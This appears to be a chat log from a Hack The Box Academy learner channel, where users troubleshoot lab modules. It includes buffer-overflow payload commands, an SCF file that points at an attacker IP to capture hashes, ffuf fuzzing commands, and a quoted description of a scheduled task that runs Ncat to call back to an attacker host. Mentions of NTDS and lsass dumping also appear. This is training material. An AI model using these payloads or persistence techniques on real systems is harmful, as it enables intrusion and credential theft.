I know. That’s why i said i found the ”flag” when i RDPed (initial foothold), because i went trough every nook and crany

well the flag is hiding in a database

that much i'll give you

My bad, meant what would lead me too it

I’ve already completed it

¯_(ツ)_/¯

it's fairly straightforward

And i’m ralking about it here because i knew something was wrong. I looked up the real solution opposed to my hack; it was one of the first things i tried

¯_(ツ)_/¯

So i don’t know if i should send a ticket to support

Or leave it

if you're unsure to send a support ticket do this:
spawn a fresh lab, repeat all your steps
repeat the official steps (assuming you mean the annual walkthrough)
if you can repeat steps and it works, then it was just that instance that was bugged

if you can repeat steps, and it doesn't work it's more likely to lean on the side of an HTB issue

there was a bug after a maintenance period (unsure if it's still lingering) where some modules that have internal networking components (like AD Enum & attacks) weren't spawning properly on US, but were on EU (by US i mean ALL of the US servers at the time)

it really affected the password attacks -- PtT from linux section because it was giving an invalid Time/date stamp

(Unix 0 time)

I’ll try it again in a bit, but it hasn’t been all that good here in EU i’d say either, i mentioned earlier that a box would take upwards of 15 minutes to spawn for me

change vpn regions then

¯_(ツ)_/¯

You don’t think i tried bro 😂

come to US

but yeah

there's rarely target issues

and it's more often user error

bc i've run into a few instances of "i swear i tried that"

only to go ↑↑↑ and see it nowhere in my command history

I’ll try it again, but how hard could fucking up with remmina be… literally fill in 2 fields and you’re done

remmina is dumb sometimes

i get its simplicity is appealing with GUI

but meh

And i tried all combinations and accounts there were lmfao, lowercase, uppercase, first dudes password, other found password on all local accounts

you didn't try the most powerful local account

I did

that's on every system

it could also have been a slight spelling mistake

The first, because that’s the only other account, i tried to be ambigious 😂😂😂

https://tenor.com/view/minor-spelling-mistake-gif-21179057

inlanefright
inlanfreight
inlanefreght...

it's surprisingly easy to typo

So you must understand why i’m confused asf coming here, because i knew that how i did it couldn’t be rightt

I’m going to try the original solution

And i’ll report back if it was just me who fatfingered something

having trouble with this question can someone help?
What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

the section gives you an example command with find

it also, again, helps if you're ssh into the target machine that's spawned

most config files are either .cfg,.conf, or .config

usually .conf is a safe bet though

hey team, (module Intro to C2 Operations with Sliver) i have a arm64 and i am having a problem downloading a donut https://github.com/TheWover/donut is there anyone who downloaded it to arm64 linux

yes ive spawned the target. and ive tried almost everything and keep getting responses like this

are you ssh into the target?

also the pwnbox is not the target

if you're referring to the little window with "spawn instance"

any help?

2> /dev/null at the end

also you don't need to do --user root

take note that the find command recursively searches through all directories from the base one you give it; so if it's trying to access a protected directory (aka not your user/root) then it's gonna display those errors

can someone provide any hint for CPTS exam ?

2> is the bash redirect of file descriptor 2 (stderr) to another file (/dev/null)

fuck no, you're on your own

thanks

you literally agreed to doing the exam on your own when you started it

the only place you can find answers to move forward is on the exam environment itself and looking back through modules for a method that may be relevant to where you're stuck

getting rickrolled in a htb module 💀

"Suppose we wanted to through spaghetti at a wall"

that's the Web Attacks module?

i swear i encountered that in one of the modules i've recently done

yeah IDOR 😄

imo

all the methods there are really fuckin dumb (in the sense that, they just work like that)

yeah I haven't taken any notes on idor yet it feels pretty basic

none of these worked...

then try .conf

run $(python3 -c "print('\x55' * (1040-4-150-100) + '\x90' * 100 + '\x44' * 150 + '\x66' * 4)")
Hello, I'm stuck on this part. Buffer overflow in the linux room. The total area is 1040 bytes and accordingly I allocate 150 bytes for shell code 100 bytes for NOPs and 4 bytes for EIP and I initialize the gdby accordingly, but the eip value falls to 0x444444444444 address, why should it fall to 0x66666666. Academy does the same but his is correct and mine is wrong.

*0x44444444

addresses won't always line up

I’ll send a support ticket later, tried it again and it din’t work

The address does not need to be the same, I am setting the offset here.

that sucks, hopefully they can fix it soon

could someone lend me a quick hand, I'm currently on the easy Footprinting lab and I am trying to "get id_rsa" for the ssh key, but I am getting a permission denied error

check if you have write permissions in the directory you are trying to save the file

I didn't even know that was a thing that could block me. Thank you!

is there ever a way to designate the directory you want to copy the file to from the ftp server?

get <filename on server> /path/to/save/locally (if you want to keep the filename you just end the path with / so /path/to/save/locally/)

I’m just relieved that i possibly couldn’t be that stupid 😂 Man i literally ping sweeped & scanned & tried to enumerate 5 different servers, found a wordpress site, and i don’t know what more until i decided fk it and brought out my toolkit i always have with me in ctfs

thank you! that helps a ton

as calc said you really shouldn't have found anything else besides what was expected on the server

That’s exactly my tought too, and that’s why i went here about it, it couldn’t possible needed to take that long

just spawned a fresh machine, and the interesting credential password worked just fine

(xfreerdp)

When i come back home i’ll try with a different VPN

remmina works as well

just to be sure you were trying the : ad* account yes?

but yeah the creds i discovered after the initial enumeration via a credentialed account work just fine for the intended user

Sent you a DM

Oh and forgot

I dumped the NTDS files too 😂

yeah dumping NTDS is way out of scope for this module

Can anyone help me?

instead run $(python3 -c “print(‘\x55’ * (1040-4-150-100) + ‘\x90’ * 50 + ‘\x44’ * 150 + ‘\x66’ * 4)”) But 786+50+150+150+4 = 990, 50 missing in between. I'm about to go crazy right now, help me

thx i succeded i hadn't activated noctification 🥲

Ah yeah you gotta do the test notification

The problem is python3. When printing "\x90" you'll end up with "\xc2\x90" instead.

python3 -c "print('\x55' * (1040-4-150-100) + '\x90' * 50 + '\x44' * 150 + '\x66' * 4)" | hexdump -C
00000000  55 55 55 55 55 55 55 55  55 55 55 55 55 55 55 55  |UUUUUUUUUUUUUUUU|
*
00000310  55 55 c2 90 c2 90 c2 90  c2 90 c2 90 c2 90 c2 90  |UU..............|
00000320  c2 90 c2 90 c2 90 c2 90  c2 90 c2 90 c2 90 c2 90  |................|
*
00000370  c2 90 c2 90 c2 90 44 44  44 44 44 44 44 44 44 44  |......DDDDDDDDDD|
00000380  44 44 44 44 44 44 44 44  44 44 44 44 44 44 44 44  |DDDDDDDDDDDDDDDD|
*
00000400  44 44 44 44 44 44 44 44  44 44 44 44 66 66 66 66  |DDDDDDDDDDDDffff|
00000410  0a                                                |.|
00000411

Either use pwntools to generate the payload or use something like this

python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (1040-4-150-100) + b'\x90' * 50 + b'\x44' * 150 + b'\x66' * 4)" | hexdump -C
00000000  55 55 55 55 55 55 55 55  55 55 55 55 55 55 55 55  |UUUUUUUUUUUUUUUU|
*
00000310  55 55 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |UU..............|
00000320  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000340  90 90 90 90 44 44 44 44  44 44 44 44 44 44 44 44  |....DDDDDDDDDDDD|
00000350  44 44 44 44 44 44 44 44  44 44 44 44 44 44 44 44  |DDDDDDDDDDDDDDDD|
*
000003d0  44 44 44 44 44 44 44 44  44 44 66 66 66 66        |DDDDDDDDDDffff|
000003de

can you not prefix the '\x00' with b instead of importing sys? or does it not work that way

No, does not work like that. You'll end up with even more garbage.

python3 -c "print(b'\x90')" | hexdump -C
00000000  62 27 5c 78 39 30 27 0a                           |b'\x90'.|
00000008

yeah just tested it

interesting

I don't fully understand what you said, I'm new to binary exploitation. Can you tell me what to write to gdb @bright coral

Will the problem be solved if I use python2?

as python2 didn't work either 😄
run $(python -c "import sys; sys.stdout.write('\x55' * (1040 - 100 - 150 - 4) + '\x90' * 100 + '\x44' * 150 + '\x66' * 4)")

python2 is deprecated

and in most distros has officially been dropped from repos

This is not mix-and-match 😉
Either you use python2.7 and "print('\x55' * (1040-4-150-100) + '\x90' * 50 + '\x44' * 150 + '\x66' * 4)"
or
Python3 and "import sys; sys.stdout.buffer.write(b'\x55' * (1040-4-150-100) + b'\x90' * 50 + b'\x44' * 150 + b'\x66' * 4)" (there are bs missing as prefix for \x55 in the version you used)

this module was written way before then

or at least the framework may have been

I don't understand a word you're saying. What am I supposed to do? @bright coral

dude

he's giving you the explicit python3 command

also in most cases python is just symlinked to python3

¯_(ツ)_/¯

(gdb) run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (1040 - 100 - 150 - 4) + b'\x90' * 100 + b'\x44' * 150 + b'\x66' * 4)")
0x66666666 in ?? ()
It worked thank you very much. I tired you a little 😦 @bright coral @fathom pendant

i used to work helpdesk

the amount of stupid i've endured far outweighs your fair question

okay i need help Windows Privilege Escalation [Interacting with Users] we have to do some srf

i am lost as i dont understand the module information

In this example, let's create the following file and name it something like @Inventory.scf (similar to another file in the directory, so it does not appear out of place). We put an @ at the start of the file name to appear at the top of the directory to ensure it is seen and executed by Windows Explorer as soon as the user accesses the share. Here we put in our tun0 IP address and any fake share name and .ico file name.
Interacting with Users

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

is the shell and commands inside the file?

Hy how are you

Ahlan chat hack in coin

What

https://tenor.com/view/are-you-having-a-stroke-liz-lemon-30rock-are-you-okay-are-you-out-of-your-mind-gif-20346146

Feck off, I didn't invite you to dm me

get muted idiot

682548

?

You good m8? Do we need to get you an ambulance?

https://tenor.com/view/sad-hamster-sadhamster-hammy-hampter-popcat-gif-6561088576429774594

i did it finally and whats my mistake? put .srf when it should be .scf

https://tenor.com/view/minor-spelling-mistake-minor-spelling-mistake-i-win-minor-spelling-mistake-i-win-meme-shadow-the-hedgehog-shadow-gif-26138585

Thanks, I'll try later 🙂

Hi

sorry new with fluff this response means nothing gathered or the results are saved in other side?

Has anyone had problems with the Introduction to Windows Evasion Techniques module!?
For some reason in the Static Analysis section, even after raving a successfully tested Reverse Shell binary in the DEV host, the automation script didn't create a flag, even after confirming it wasn't detected in the logs.
Now the same in the Dynamic Analysis. Executed the same steps as in the Section, tested on DEV, got a callback, the file does not get picked by Defender as it states in the log file, but it just times out after it being executed
(cannot confirm it's executed due to low level permissions and cannot debug the automation script)

@golden horizon please do not post spoilers / answers to modules / sections over Tier 0 here.

Even recorded a screen capture

Instead, ask a question that someone can respond to you either in DM or here without providing a spoiler in turn

this is a common thing with ffuf not in full screen

??

ffuf likes to constantly show new lines with progress if your terminal isn't full screen for whatever reason

so i should run it again on full screen?

yeah

ok ty master

don't

Hey for this question ==> Attack the Splunk target and gain remote code execution. Submit the contents of the flag.txt file in the c:\loot directory.
i didn't get reverse shell

how to resolve it?

make sure your payload has your tun0 IP in it

it also helps if you provide the module and section name

also make sure your job names are labeled properly before compressing it back into the zip

i.e. run.ps1; not rev.ps1

the only reason I know what module you're talking about is bc i only just did this the other day

i got it thanks for ur support!!!!

guys for this website https://dehashed.com/api mentionned at this section https://academy.hackthebox.com/module/113/section/1214 do you have to pay? into on section he don't pay api or rather it uses no api

You don't need to use dehashed

The example output can be useful though

okok thx 😅

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x55' * (1040 - 256 - 4) + b'\x01\x02\x03\x04\x05\x06\x07....SNIP....\xfa\xfb\xfc\xfd\xfe\xff' + b'\x66' * 4)")

x/2000xb $esp+500
When I examine the bad characters I see that they all exist, I wonder where I am going wrong

@bright coral Dude, are you here?

Well if that's lifted from the example

No, I shortened my own code so that it doesn't take up the page.

👍

run $(python -c 'print "\x55" * (1040 - 254 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')
This example in the module is already not working, I need to edit it, but when I edit it, I could not detect any bad characters.

Hi I'm struggling on the skills assessment for the pivot module. I've managed to use the foothold webshell to upload ligolong and find a target (target1) behind the foothold. Then I found two more targets behind target1. So setup a double pivot using ligolong to those targets and that all works fine.

I'm stuck on getting a shell on the two targets behind target1

I have the credentials I found on the foothold which I used to login to target1

I also found another user and I rhink a network share

I tried reusing creds for the 2 targets behind target1

Thought I'd ask here b4 moving in to exploit searching

There's only one target accessible per hop

Make sure you aren't being silly and accidentally looking at that same host's ip

There's no need for exploit searching from what I recall

Ok thx

Definitely two targets behind the second hop

I did find a host with rdp service behind second host. And tried various credentials.... that's as far as I got

So you got q3?

And q2 ofc

i got q1, 2, 3, 4 and 5

5 was a bit of a guess. I didn't actually validate what the user was vulnerable to

You get 5 (and his password) from a dump

Lsass is your friend, if you're stuck

thank u 🙂

That comforts me a little

The last 2 questions will be achievable from that last point

got it

Aka the next host you hop to is the end of the road

thanks, perhaps i should have took a step back and thought about all the things i've learnt

thanks for the hint, i think i should be able to get therrr now 🙂

:) btw you won't have to crack any passwords

It will be in plain text

awesome..!!

thank you for this, I spent about an hour on this question alone

Sessions Module

CSRF Session ID stealing

Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.14.251 - - [20/Aug/2024 21:40:59] "GET /csrf.html HTTP/1.1" 200 -
10.10.14.251 - - [20/Aug/2024 21:41:51] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:42:39] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:48:22] "GET /csrf0.html HTTP/1.1" 200 -
10.10.14.251 - - [20/Aug/2024 21:57:22] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:57:46] "GET /csrf0.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:59:08] "GET /csrf0.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 21:59:35] "GET /csrf.html HTTP/1.1" 304 -
10.10.14.251 - - [20/Aug/2024 22:02:32] "GET /csrf0.html HTTP/1.1" 304 -

Why is there 304 status codes? And even when there is a 200 status code and the CSRF is successfully requested, it still doesnt change my profile details. Whats wrong with this?

Hey. I’m having trouble with finding the flag through mongo. The shell returns nothing when I use “db.flag.find().pretty()

What academy module is this from?

And what section

If it's a starting point machine, read and follow #welcome --> #starting-point

Ty. It’s a starting point machine.

I figured

was anyone able to get Rogue Potato working on Module Windows Privilege Escalation -> SeImpersonate and SeAssignPrimaryToken . No matter what I try I keep getting Connection refused or Connection Reset on my socat listener

I used printspoofer

yeah same i got that one to work. was just trying to practice all 3 techniques but i'm starting to think that maybe Rogue Potato isn't possible. wanted to see if someone was able to get it to work at all

you need to use a suitable clsid

okay yeah i didn't try using the non-default clsid so i'll try that next. thanks

Let’s see. What module was I on

Yeah I've heard the hardest part about boiling the potatoes is the right clsid

afaik it's a guessing game

There's some logic

hi

Based on os version

But beyond that you dive deeper into specific build versions

Recursively fuzz the "recursive_fuzz" path on the target system (ie http://IP:PORT/recursive_fuzz/) to find the flag. I can't get the answer

paaain

https://learn.microsoft.com/en-us/windows/win32/com/clsid-key-hklm

Well did you recursively fuzz the directory given on the spawned ip/port?

Don't use the recursion limit

Yes, I've been here for more than an hour without any results.

Shouldn't take an hour

Reset the target

Also make sure you use the right list, iirc the medium list is whats shown

I didn't solve the lab , but maybe you should dig deeper more depth

https://tenor.com/view/this-is-a-disaster-john-malkovich-dr-adrian-mallory-space-force-bad-news-gif-17483727

Short answer if you can enum HKLM:\ you can find clsids

good to know

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://94.237.49.212:48712/recursive_fuzz/level1/level2/level3/FUZZ -e .html,.php,.phps -c -ic -t 200 -recursion -recursion-depth 2 -rate 500

is the command i am using now but i have no results

Take off the recursion depth

You could also be overloading the server with threads

Drop to 100

Also as an FYI you don't need to do :FUZZ after your wordlist, it's assumed

Only when you use multiple wordlists do you need to specify

ok

kinda interesting. Juicy Potato works on this box but Rogue Potato doesn't, and the exploits use the same CLSID by default

so i dunno. the module doesn't really talk about how to enumerate CLSIDs so i think it might be out of scope for CPTS which is what I care about.

yeah , I usually use printspoofer but knowing that there's other tools that can done the same job can be helpfull sometimes

yeah for sure. i appreciate you reaching out with ideas

if anyone else go through chat history 5 years from now and can get Rogue Potato to work on the Windows Privilege Escalation -> SeImpersonate and SeAssignPrimaryToken module exercise feel free to DM me about whatever it is that I'm not understanding 🤣

Why kubernetes has no exercises

Without practice I feel like an idiot.

The command is invalid

Especially in "-p" flags

I used volatility3

Been trying to search the function, specific code, etc . But no results

Because k8s are a pain and to widely deploy I'm sure would suck

Well the -p is the pid no?

The valid one is --pid

Ah

Maybe a version difference then

¯_(ツ)_/¯

Hi in the Documentation & Reporting Practice Lab. Should I be able to scan the subnet 172.16.5.0/24? I ran a masscan of all ports in that subnet and get 0 results. I've restarted the box am I missing something?

You'd have to be inside the internal network to scan it

I scanned from the Parrot Box

?

You mean the spawned target?

yes

The 10.129.x.x machine

yes

If you do ip a that should be it's ip, alongside another ip that would allow you to see the internal network

If you see a public ip and 10.10.x.x that's not the target

(Covering my bases here)

I see 172.16.5.225/23 along side the target ip

👍

Reach out to support ig

Alternatively try scanning 172.16.5.0/23

is there a support channel or do I @ something?

Green bubble on academy website

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

I solved the question.
Annoying thing is you shouldn't enter the ps1 extension

A doubt about this command ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v This command will execute for the temporary variable FUZZ the commands from the specified wordlist, both as they are and with the added .php?(because the -e .php) So, will two lists be iterated?

I know recursively but that's my main question

Yes 2 lists are iterated

Also generally don't limit recursion unless you absolutely have to

Technically they're run in parallel bc threads.

thank you

A great example of a use for schtasks would be providing us with a callback every time the host boots up. This would ensure that if our shell dies, we will get a callback from the host the next time a reboot occurs, making it likely that we will only lose access to the host for a short time if something happens or the host is shut down. We can create or modify a new task by adding a new trigger and action. In our task above, we have schtasks execute Ncat locally, which we placed in the user's AppData directory, and connect to the host `172.16.1.100` on port `8100`. If successfully executed, this connection request should connect to our command and control framework (Metasploit, Empire, etc.) and give us shell access.

Introduction to windows command line, Working with scheduled tasks

Can you not

Im just curious, so the attacker used a scheduled task (on startup) to use a program local to the target (Ncat), to connect to the attacker

I'm not an on-call support

you arent?

No

1. I'm not paid to
2. if I was it's nearly 1 am

apologies

if anyone still having issues with this, i thoughut there was 2 RDP tools on kali so googled "xfreerdp vs"... didn't get the results I expected BUT as I'm going through the Active Directory Enumeration & Attacks module atm I recall a tool called Remmina. Downloaded it, tried it and worked almost immediately so worth a try

(Sidenote I'm not paid at all I don't work for htb, I just volunteer my time)

ill do the same once i have some more knowledge under my belt

thanks for all the help thus far

It's not an issue btw

All you need to do is press enter

As I have told people ad nauseum

It's a failure to draw the corporate/enterprise AUP screen

Don't know why it happens, it does

But to answer this question, yes

A script is run on startup that sends the connection to the attacker

thats really awesome